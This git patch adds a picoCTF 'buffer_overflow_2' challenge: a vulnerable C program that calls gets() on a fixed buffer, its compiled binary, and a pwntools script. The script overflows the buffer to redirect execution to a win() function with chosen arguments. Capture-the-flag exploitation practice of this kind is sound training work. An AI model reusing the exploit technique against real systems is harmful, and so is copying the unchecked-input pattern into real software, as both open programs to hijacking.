From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001 From: h7x4 <h7x4@nani.wtf> Date: Tue, 3 Sep 2024 19:46:13 +0200 Subject: [PATCH] pwn/buffer_overflow_2 --- pwn/buffer_overflow_2/solve.py | 31 ++++++++++++++++++++++++ pwn/buffer_overflow_2/vuln | Bin 0 -> 15808 bytes pwn/buffer_overflow_2/vuln.c | 43 +++++++++++++++++++++++++++++++++ 3 files changed, 74 insertions(+) create mode 100755 pwn/buffer_overflow_2/solve.py create mode 100755 pwn/buffer_overflow_2/vuln create mode 100644 pwn/buffer_overflow_2/vuln.c diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py new file mode 100755 index 0000000..b3dab5e --- /dev/null +++ b/pwn/buffer_overflow_2/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 55214".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + print(r.recvuntil(b"Please enter your string:")) + offset = 112 # found with pwndbg + payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D) + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa GIT binary patch literal 15808 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 T0kXQ2<_rw7FiB{bfz$y2vc+&Y literal 0 HcmV?d00001 diff --git a/pwn/buffer_overflow_2/vuln.c b/pwn/buffer_overflow_2/vuln.c new file mode 100644 index 0000000..60b8d31 --- /dev/null +++ b/pwn/buffer_overflow_2/vuln.c @@ -0,0 +1,43 @@ +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> +#include <sys/types.h> + +#define BUFSIZE 100 +#define FLAGSIZE 64 + +void win(unsigned int arg1, unsigned int arg2) { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + if (arg1 != 0xCAFEF00D) + return; + if (arg2 != 0xF00DF00D) + return; + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + puts(buf); +} + +int main(int argc, char **argv){ + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +